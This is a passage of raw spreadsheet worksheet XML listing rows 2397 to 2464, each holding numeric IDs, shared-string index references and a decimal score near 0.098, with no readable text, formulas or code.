      <c r="A2397" s="1">
        <v>12.0</v>
      </c>
      <c r="B2397" s="2">
        <v>1.0326698E7</v>
      </c>
      <c r="C2397" s="2" t="s">
        <v>2214</v>
      </c>
      <c r="D2397" s="2">
        <v>1.0</v>
      </c>
      <c r="E2397" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2397" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="2398" ht="15.75" customHeight="1">
      <c r="A2398" s="1">
        <v>14437.0</v>
      </c>
      <c r="B2398" s="2">
        <v>3.9295001E7</v>
      </c>
      <c r="C2398" s="2" t="s">
        <v>2215</v>
      </c>
      <c r="D2398" s="2">
        <v>1.0</v>
      </c>
      <c r="E2398" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2398" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="2399" ht="15.75" customHeight="1">
      <c r="A2399" s="1">
        <v>17571.0</v>
      </c>
      <c r="B2399" s="2">
        <v>5.0261813E7</v>
      </c>
      <c r="C2399" s="2" t="s">
        <v>2216</v>
      </c>
      <c r="D2399" s="2">
        <v>1.0</v>
      </c>
      <c r="E2399" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2399" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="2400" ht="15.75" customHeight="1">
      <c r="A2400" s="1">
        <v>20744.0</v>
      </c>
      <c r="B2400" s="2">
        <v>1.4781324E7</v>
      </c>
      <c r="C2400" s="2" t="s">
        <v>2217</v>
      </c>
      <c r="D2400" s="2">
        <v>1.0</v>
      </c>
      <c r="E2400" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2400" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="2401" ht="15.75" customHeight="1">
      <c r="A2401" s="1">
        <v>22792.0</v>
      </c>
      <c r="B2401" s="2">
        <v>4.5484695E7</v>
      </c>
      <c r="C2401" s="2" t="s">
        <v>2218</v>
      </c>
      <c r="D2401" s="2">
        <v>1.0</v>
      </c>
      <c r="E2401" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2401" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="2402" ht="15.75" customHeight="1">
      <c r="A2402" s="1">
        <v>27365.0</v>
      </c>
      <c r="B2402" s="2">
        <v>2.1673444E7</v>
      </c>
      <c r="C2402" s="2" t="s">
        <v>2219</v>
      </c>
      <c r="D2402" s="2">
        <v>1.0</v>
      </c>
      <c r="E2402" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2402" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="2403" ht="15.75" customHeight="1">
      <c r="A2403" s="1">
        <v>5035.0</v>
      </c>
      <c r="B2403" s="2">
        <v>4.4266737E7</v>
      </c>
      <c r="C2403" s="2" t="s">
        <v>2220</v>
      </c>
      <c r="D2403" s="2">
        <v>1.0</v>
      </c>
      <c r="E2403" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2403" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="2404" ht="15.75" customHeight="1">
      <c r="A2404" s="1">
        <v>16291.0</v>
      </c>
      <c r="B2404" s="2">
        <v>4.5829346E7</v>
      </c>
      <c r="C2404" s="2" t="s">
        <v>2221</v>
      </c>
      <c r="D2404" s="2">
        <v>1.0</v>
      </c>
      <c r="E2404" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2404" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="2405" ht="15.75" customHeight="1">
      <c r="A2405" s="1">
        <v>33468.0</v>
      </c>
      <c r="B2405" s="2">
        <v>7968896.0</v>
      </c>
      <c r="C2405" s="2" t="s">
        <v>2222</v>
      </c>
      <c r="D2405" s="2">
        <v>1.0</v>
      </c>
      <c r="E2405" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2405" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="2406" ht="15.75" customHeight="1">
      <c r="A2406" s="1">
        <v>33128.0</v>
      </c>
      <c r="B2406" s="2">
        <v>7020050.0</v>
      </c>
      <c r="C2406" s="2" t="s">
        <v>2223</v>
      </c>
      <c r="D2406" s="2">
        <v>1.0</v>
      </c>
      <c r="E2406" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2406" s="2">
        <v>0.09797979797979794</v>
      </c>
    </row>
    <row r="2407" ht="15.75" customHeight="1">
      <c r="A2407" s="1">
        <v>8818.0</v>
      </c>
      <c r="B2407" s="2">
        <v>5.4634584E7</v>
      </c>
      <c r="C2407" s="2" t="s">
        <v>2224</v>
      </c>
      <c r="D2407" s="2">
        <v>1.0</v>
      </c>
      <c r="E2407" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2407" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="2408" ht="15.75" customHeight="1">
      <c r="A2408" s="1">
        <v>11958.0</v>
      </c>
      <c r="B2408" s="2">
        <v>2.5595429E7</v>
      </c>
      <c r="C2408" s="2" t="s">
        <v>2225</v>
      </c>
      <c r="D2408" s="2">
        <v>1.0</v>
      </c>
      <c r="E2408" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2408" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="2409" ht="15.75" customHeight="1">
      <c r="A2409" s="1">
        <v>23314.0</v>
      </c>
      <c r="B2409" s="2">
        <v>5.4216632E7</v>
      </c>
      <c r="C2409" s="2" t="s">
        <v>2226</v>
      </c>
      <c r="D2409" s="2">
        <v>1.0</v>
      </c>
      <c r="E2409" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2409" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="2410" ht="15.75" customHeight="1">
      <c r="A2410" s="1">
        <v>26674.0</v>
      </c>
      <c r="B2410" s="2">
        <v>1.8075693E7</v>
      </c>
      <c r="C2410" s="2" t="s">
        <v>1975</v>
      </c>
      <c r="D2410" s="2">
        <v>1.0</v>
      </c>
      <c r="E2410" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2410" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="2411" ht="15.75" customHeight="1">
      <c r="A2411" s="1">
        <v>33397.0</v>
      </c>
      <c r="B2411" s="2">
        <v>7702556.0</v>
      </c>
      <c r="C2411" s="2" t="s">
        <v>2227</v>
      </c>
      <c r="D2411" s="2">
        <v>1.0</v>
      </c>
      <c r="E2411" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2411" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="2412" ht="15.75" customHeight="1">
      <c r="A2412" s="1">
        <v>1350.0</v>
      </c>
      <c r="B2412" s="2">
        <v>2.5960572E7</v>
      </c>
      <c r="C2412" s="2" t="s">
        <v>2228</v>
      </c>
      <c r="D2412" s="2">
        <v>1.0</v>
      </c>
      <c r="E2412" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2412" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="2413" ht="15.75" customHeight="1">
      <c r="A2413" s="1">
        <v>20145.0</v>
      </c>
      <c r="B2413" s="2">
        <v>1.0171583E7</v>
      </c>
      <c r="C2413" s="2" t="s">
        <v>2229</v>
      </c>
      <c r="D2413" s="2">
        <v>1.0</v>
      </c>
      <c r="E2413" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2413" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="2414" ht="15.75" customHeight="1">
      <c r="A2414" s="1">
        <v>23935.0</v>
      </c>
      <c r="B2414" s="2">
        <v>8731959.0</v>
      </c>
      <c r="C2414" s="2" t="s">
        <v>2230</v>
      </c>
      <c r="D2414" s="2">
        <v>1.0</v>
      </c>
      <c r="E2414" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2414" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="2415" ht="15.75" customHeight="1">
      <c r="A2415" s="1">
        <v>27338.0</v>
      </c>
      <c r="B2415" s="2">
        <v>2.1456103E7</v>
      </c>
      <c r="C2415" s="2" t="s">
        <v>2231</v>
      </c>
      <c r="D2415" s="2">
        <v>1.0</v>
      </c>
      <c r="E2415" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2415" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="2416" ht="15.75" customHeight="1">
      <c r="A2416" s="1">
        <v>29529.0</v>
      </c>
      <c r="B2416" s="2">
        <v>3.282336E7</v>
      </c>
      <c r="C2416" s="2" t="s">
        <v>2232</v>
      </c>
      <c r="D2416" s="2">
        <v>1.0</v>
      </c>
      <c r="E2416" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2416" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="2417" ht="15.75" customHeight="1">
      <c r="A2417" s="1">
        <v>21470.0</v>
      </c>
      <c r="B2417" s="2">
        <v>2.2885599E7</v>
      </c>
      <c r="C2417" s="2" t="s">
        <v>2233</v>
      </c>
      <c r="D2417" s="2">
        <v>1.0</v>
      </c>
      <c r="E2417" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2417" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="2418" ht="15.75" customHeight="1">
      <c r="A2418" s="1">
        <v>27263.0</v>
      </c>
      <c r="B2418" s="2">
        <v>2.1164051E7</v>
      </c>
      <c r="C2418" s="2" t="s">
        <v>2234</v>
      </c>
      <c r="D2418" s="2">
        <v>1.0</v>
      </c>
      <c r="E2418" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2418" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="2419" ht="15.75" customHeight="1">
      <c r="A2419" s="1">
        <v>13523.0</v>
      </c>
      <c r="B2419" s="2">
        <v>3.5514139E7</v>
      </c>
      <c r="C2419" s="2" t="s">
        <v>2235</v>
      </c>
      <c r="D2419" s="2">
        <v>1.0</v>
      </c>
      <c r="E2419" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2419" s="2">
        <v>0.09773662551440325</v>
      </c>
    </row>
    <row r="2420" ht="15.75" customHeight="1">
      <c r="A2420" s="1">
        <v>2685.0</v>
      </c>
      <c r="B2420" s="2">
        <v>3.4811654E7</v>
      </c>
      <c r="C2420" s="2" t="s">
        <v>2236</v>
      </c>
      <c r="D2420" s="2">
        <v>1.0</v>
      </c>
      <c r="E2420" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2420" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="2421" ht="15.75" customHeight="1">
      <c r="A2421" s="1">
        <v>10129.0</v>
      </c>
      <c r="B2421" s="2">
        <v>5.7289256E7</v>
      </c>
      <c r="C2421" s="2" t="s">
        <v>2237</v>
      </c>
      <c r="D2421" s="2">
        <v>1.0</v>
      </c>
      <c r="E2421" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2421" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="2422" ht="15.75" customHeight="1">
      <c r="A2422" s="1">
        <v>15844.0</v>
      </c>
      <c r="B2422" s="2">
        <v>4.4403443E7</v>
      </c>
      <c r="C2422" s="2" t="s">
        <v>2238</v>
      </c>
      <c r="D2422" s="2">
        <v>1.0</v>
      </c>
      <c r="E2422" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2422" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="2423" ht="15.75" customHeight="1">
      <c r="A2423" s="1">
        <v>20007.0</v>
      </c>
      <c r="B2423" s="2">
        <v>5.7732494E7</v>
      </c>
      <c r="C2423" s="2" t="s">
        <v>2239</v>
      </c>
      <c r="D2423" s="2">
        <v>1.0</v>
      </c>
      <c r="E2423" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2423" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="2424" ht="15.75" customHeight="1">
      <c r="A2424" s="1">
        <v>34051.0</v>
      </c>
      <c r="B2424" s="2">
        <v>9592528.0</v>
      </c>
      <c r="C2424" s="2" t="s">
        <v>2240</v>
      </c>
      <c r="D2424" s="2">
        <v>1.0</v>
      </c>
      <c r="E2424" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2424" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="2425" ht="15.75" customHeight="1">
      <c r="A2425" s="1">
        <v>198.0</v>
      </c>
      <c r="B2425" s="2">
        <v>1.4435257E7</v>
      </c>
      <c r="C2425" s="2" t="s">
        <v>2241</v>
      </c>
      <c r="D2425" s="2">
        <v>1.0</v>
      </c>
      <c r="E2425" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2425" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2426" ht="15.75" customHeight="1">
      <c r="A2426" s="1">
        <v>1614.0</v>
      </c>
      <c r="B2426" s="2">
        <v>2.7819515E7</v>
      </c>
      <c r="C2426" s="2" t="s">
        <v>2242</v>
      </c>
      <c r="D2426" s="2">
        <v>1.0</v>
      </c>
      <c r="E2426" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2426" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2427" ht="15.75" customHeight="1">
      <c r="A2427" s="1">
        <v>2439.0</v>
      </c>
      <c r="B2427" s="2">
        <v>3.3685135E7</v>
      </c>
      <c r="C2427" s="2" t="s">
        <v>2243</v>
      </c>
      <c r="D2427" s="2">
        <v>1.0</v>
      </c>
      <c r="E2427" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2427" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2428" ht="15.75" customHeight="1">
      <c r="A2428" s="1">
        <v>3414.0</v>
      </c>
      <c r="B2428" s="2">
        <v>3.8132189E7</v>
      </c>
      <c r="C2428" s="2" t="s">
        <v>2244</v>
      </c>
      <c r="D2428" s="2">
        <v>1.0</v>
      </c>
      <c r="E2428" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2428" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2429" ht="15.75" customHeight="1">
      <c r="A2429" s="1">
        <v>5148.0</v>
      </c>
      <c r="B2429" s="2">
        <v>4.4669017E7</v>
      </c>
      <c r="C2429" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="D2429" s="2">
        <v>1.0</v>
      </c>
      <c r="E2429" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2429" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2430" ht="15.75" customHeight="1">
      <c r="A2430" s="1">
        <v>6160.0</v>
      </c>
      <c r="B2430" s="2">
        <v>4.7872694E7</v>
      </c>
      <c r="C2430" s="2" t="s">
        <v>2246</v>
      </c>
      <c r="D2430" s="2">
        <v>1.0</v>
      </c>
      <c r="E2430" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2430" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2431" ht="15.75" customHeight="1">
      <c r="A2431" s="1">
        <v>6615.0</v>
      </c>
      <c r="B2431" s="2">
        <v>4.9026912E7</v>
      </c>
      <c r="C2431" s="2" t="s">
        <v>2247</v>
      </c>
      <c r="D2431" s="2">
        <v>1.0</v>
      </c>
      <c r="E2431" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2431" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2432" ht="15.75" customHeight="1">
      <c r="A2432" s="1">
        <v>6733.0</v>
      </c>
      <c r="B2432" s="2">
        <v>4.9334775E7</v>
      </c>
      <c r="C2432" s="2" t="s">
        <v>2248</v>
      </c>
      <c r="D2432" s="2">
        <v>1.0</v>
      </c>
      <c r="E2432" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2432" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2433" ht="15.75" customHeight="1">
      <c r="A2433" s="1">
        <v>6829.0</v>
      </c>
      <c r="B2433" s="2">
        <v>4.9594809E7</v>
      </c>
      <c r="C2433" s="2" t="s">
        <v>2249</v>
      </c>
      <c r="D2433" s="2">
        <v>1.0</v>
      </c>
      <c r="E2433" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2433" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2434" ht="15.75" customHeight="1">
      <c r="A2434" s="1">
        <v>8762.0</v>
      </c>
      <c r="B2434" s="2">
        <v>5.4575747E7</v>
      </c>
      <c r="C2434" s="2" t="s">
        <v>2250</v>
      </c>
      <c r="D2434" s="2">
        <v>1.0</v>
      </c>
      <c r="E2434" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2434" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2435" ht="15.75" customHeight="1">
      <c r="A2435" s="1">
        <v>8986.0</v>
      </c>
      <c r="B2435" s="2">
        <v>5.4962246E7</v>
      </c>
      <c r="C2435" s="2" t="s">
        <v>2251</v>
      </c>
      <c r="D2435" s="2">
        <v>1.0</v>
      </c>
      <c r="E2435" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2435" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2436" ht="15.75" customHeight="1">
      <c r="A2436" s="1">
        <v>9452.0</v>
      </c>
      <c r="B2436" s="2">
        <v>5.5844044E7</v>
      </c>
      <c r="C2436" s="2" t="s">
        <v>2252</v>
      </c>
      <c r="D2436" s="2">
        <v>1.0</v>
      </c>
      <c r="E2436" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2436" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2437" ht="15.75" customHeight="1">
      <c r="A2437" s="1">
        <v>11017.0</v>
      </c>
      <c r="B2437" s="2">
        <v>1780812.0</v>
      </c>
      <c r="C2437" s="2" t="s">
        <v>2253</v>
      </c>
      <c r="D2437" s="2">
        <v>1.0</v>
      </c>
      <c r="E2437" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2437" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2438" ht="15.75" customHeight="1">
      <c r="A2438" s="1">
        <v>11954.0</v>
      </c>
      <c r="B2438" s="2">
        <v>2.5593667E7</v>
      </c>
      <c r="C2438" s="2" t="s">
        <v>2254</v>
      </c>
      <c r="D2438" s="2">
        <v>1.0</v>
      </c>
      <c r="E2438" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2438" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2439" ht="15.75" customHeight="1">
      <c r="A2439" s="1">
        <v>12609.0</v>
      </c>
      <c r="B2439" s="2">
        <v>3.0156628E7</v>
      </c>
      <c r="C2439" s="2" t="s">
        <v>2255</v>
      </c>
      <c r="D2439" s="2">
        <v>1.0</v>
      </c>
      <c r="E2439" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2439" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2440" ht="15.75" customHeight="1">
      <c r="A2440" s="1">
        <v>13992.0</v>
      </c>
      <c r="B2440" s="2">
        <v>3.7383221E7</v>
      </c>
      <c r="C2440" s="2" t="s">
        <v>2256</v>
      </c>
      <c r="D2440" s="2">
        <v>1.0</v>
      </c>
      <c r="E2440" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2440" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2441" ht="15.75" customHeight="1">
      <c r="A2441" s="1">
        <v>14257.0</v>
      </c>
      <c r="B2441" s="2">
        <v>3.8389279E7</v>
      </c>
      <c r="C2441" s="2" t="s">
        <v>2257</v>
      </c>
      <c r="D2441" s="2">
        <v>1.0</v>
      </c>
      <c r="E2441" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2441" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2442" ht="15.75" customHeight="1">
      <c r="A2442" s="1">
        <v>15015.0</v>
      </c>
      <c r="B2442" s="2">
        <v>4.1504749E7</v>
      </c>
      <c r="C2442" s="2" t="s">
        <v>2258</v>
      </c>
      <c r="D2442" s="2">
        <v>1.0</v>
      </c>
      <c r="E2442" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2442" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2443" ht="15.75" customHeight="1">
      <c r="A2443" s="1">
        <v>15063.0</v>
      </c>
      <c r="B2443" s="2">
        <v>4.1702687E7</v>
      </c>
      <c r="C2443" s="2" t="s">
        <v>2259</v>
      </c>
      <c r="D2443" s="2">
        <v>1.0</v>
      </c>
      <c r="E2443" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2443" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2444" ht="15.75" customHeight="1">
      <c r="A2444" s="1">
        <v>15114.0</v>
      </c>
      <c r="B2444" s="2">
        <v>4.1855051E7</v>
      </c>
      <c r="C2444" s="2" t="s">
        <v>2260</v>
      </c>
      <c r="D2444" s="2">
        <v>1.0</v>
      </c>
      <c r="E2444" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2444" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2445" ht="15.75" customHeight="1">
      <c r="A2445" s="1">
        <v>17135.0</v>
      </c>
      <c r="B2445" s="2">
        <v>4.8829547E7</v>
      </c>
      <c r="C2445" s="2" t="s">
        <v>2261</v>
      </c>
      <c r="D2445" s="2">
        <v>1.0</v>
      </c>
      <c r="E2445" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2445" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2446" ht="15.75" customHeight="1">
      <c r="A2446" s="1">
        <v>18290.0</v>
      </c>
      <c r="B2446" s="2">
        <v>5.2301392E7</v>
      </c>
      <c r="C2446" s="2" t="s">
        <v>2262</v>
      </c>
      <c r="D2446" s="2">
        <v>1.0</v>
      </c>
      <c r="E2446" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2446" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2447" ht="15.75" customHeight="1">
      <c r="A2447" s="1">
        <v>20258.0</v>
      </c>
      <c r="B2447" s="2">
        <v>1.1045433E7</v>
      </c>
      <c r="C2447" s="2" t="s">
        <v>2263</v>
      </c>
      <c r="D2447" s="2">
        <v>1.0</v>
      </c>
      <c r="E2447" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2447" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2448" ht="15.75" customHeight="1">
      <c r="A2448" s="1">
        <v>20406.0</v>
      </c>
      <c r="B2448" s="2">
        <v>1.2208265E7</v>
      </c>
      <c r="C2448" s="2" t="s">
        <v>2264</v>
      </c>
      <c r="D2448" s="2">
        <v>1.0</v>
      </c>
      <c r="E2448" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2448" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2449" ht="15.75" customHeight="1">
      <c r="A2449" s="1">
        <v>20495.0</v>
      </c>
      <c r="B2449" s="2">
        <v>1.2874787E7</v>
      </c>
      <c r="C2449" s="2" t="s">
        <v>2265</v>
      </c>
      <c r="D2449" s="2">
        <v>1.0</v>
      </c>
      <c r="E2449" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2449" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2450" ht="15.75" customHeight="1">
      <c r="A2450" s="1">
        <v>20706.0</v>
      </c>
      <c r="B2450" s="2">
        <v>1.4550212E7</v>
      </c>
      <c r="C2450" s="2" t="s">
        <v>2266</v>
      </c>
      <c r="D2450" s="2">
        <v>1.0</v>
      </c>
      <c r="E2450" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2450" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2451" ht="15.75" customHeight="1">
      <c r="A2451" s="1">
        <v>20836.0</v>
      </c>
      <c r="B2451" s="2">
        <v>1.5546826E7</v>
      </c>
      <c r="C2451" s="2" t="s">
        <v>2267</v>
      </c>
      <c r="D2451" s="2">
        <v>1.0</v>
      </c>
      <c r="E2451" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2451" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2452" ht="15.75" customHeight="1">
      <c r="A2452" s="1">
        <v>21409.0</v>
      </c>
      <c r="B2452" s="2">
        <v>2.1974458E7</v>
      </c>
      <c r="C2452" s="2" t="s">
        <v>2268</v>
      </c>
      <c r="D2452" s="2">
        <v>1.0</v>
      </c>
      <c r="E2452" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2452" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2453" ht="15.75" customHeight="1">
      <c r="A2453" s="1">
        <v>21724.0</v>
      </c>
      <c r="B2453" s="2">
        <v>2.5630088E7</v>
      </c>
      <c r="C2453" s="2" t="s">
        <v>2269</v>
      </c>
      <c r="D2453" s="2">
        <v>1.0</v>
      </c>
      <c r="E2453" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2453" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2454" ht="15.75" customHeight="1">
      <c r="A2454" s="1">
        <v>22424.0</v>
      </c>
      <c r="B2454" s="2">
        <v>3.6107382E7</v>
      </c>
      <c r="C2454" s="2" t="s">
        <v>2270</v>
      </c>
      <c r="D2454" s="2">
        <v>1.0</v>
      </c>
      <c r="E2454" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2454" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2455" ht="15.75" customHeight="1">
      <c r="A2455" s="1">
        <v>22464.0</v>
      </c>
      <c r="B2455" s="2">
        <v>3.6569338E7</v>
      </c>
      <c r="C2455" s="2" t="s">
        <v>2271</v>
      </c>
      <c r="D2455" s="2">
        <v>1.0</v>
      </c>
      <c r="E2455" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2455" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2456" ht="15.75" customHeight="1">
      <c r="A2456" s="1">
        <v>22603.0</v>
      </c>
      <c r="B2456" s="2">
        <v>3.9541152E7</v>
      </c>
      <c r="C2456" s="2" t="s">
        <v>2272</v>
      </c>
      <c r="D2456" s="2">
        <v>1.0</v>
      </c>
      <c r="E2456" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2456" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2457" ht="15.75" customHeight="1">
      <c r="A2457" s="1">
        <v>23008.0</v>
      </c>
      <c r="B2457" s="2">
        <v>4.9807414E7</v>
      </c>
      <c r="C2457" s="2" t="s">
        <v>2273</v>
      </c>
      <c r="D2457" s="2">
        <v>1.0</v>
      </c>
      <c r="E2457" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2457" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2458" ht="15.75" customHeight="1">
      <c r="A2458" s="1">
        <v>23407.0</v>
      </c>
      <c r="B2458" s="2">
        <v>5.5942384E7</v>
      </c>
      <c r="C2458" s="2" t="s">
        <v>2274</v>
      </c>
      <c r="D2458" s="2">
        <v>1.0</v>
      </c>
      <c r="E2458" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2458" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2459" ht="15.75" customHeight="1">
      <c r="A2459" s="1">
        <v>23438.0</v>
      </c>
      <c r="B2459" s="2">
        <v>5665431.0</v>
      </c>
      <c r="C2459" s="2" t="s">
        <v>2275</v>
      </c>
      <c r="D2459" s="2">
        <v>1.0</v>
      </c>
      <c r="E2459" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2459" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2460" ht="15.75" customHeight="1">
      <c r="A2460" s="1">
        <v>23474.0</v>
      </c>
      <c r="B2460" s="2">
        <v>5.722178E7</v>
      </c>
      <c r="C2460" s="2" t="s">
        <v>2276</v>
      </c>
      <c r="D2460" s="2">
        <v>1.0</v>
      </c>
      <c r="E2460" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2460" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2461" ht="15.75" customHeight="1">
      <c r="A2461" s="1">
        <v>23501.0</v>
      </c>
      <c r="B2461" s="2">
        <v>5778743.0</v>
      </c>
      <c r="C2461" s="2" t="s">
        <v>2277</v>
      </c>
      <c r="D2461" s="2">
        <v>1.0</v>
      </c>
      <c r="E2461" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2461" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2462" ht="15.75" customHeight="1">
      <c r="A2462" s="1">
        <v>23524.0</v>
      </c>
      <c r="B2462" s="2">
        <v>5867063.0</v>
      </c>
      <c r="C2462" s="2" t="s">
        <v>2278</v>
      </c>
      <c r="D2462" s="2">
        <v>1.0</v>
      </c>
      <c r="E2462" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2462" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2463" ht="15.75" customHeight="1">
      <c r="A2463" s="1">
        <v>23641.0</v>
      </c>
      <c r="B2463" s="2">
        <v>6688336.0</v>
      </c>
      <c r="C2463" s="2" t="s">
        <v>2279</v>
      </c>
      <c r="D2463" s="2">
        <v>1.0</v>
      </c>
      <c r="E2463" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2463" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="2464" ht="15.75" customHeight="1">
      <c r="A2464" s="1">
        <v>23694.0</v>
      </c>
      <c r="B2464" s="2">
        <v>7065765.0</v>
      </c>
      <c r="C2464" s="2" t="s">
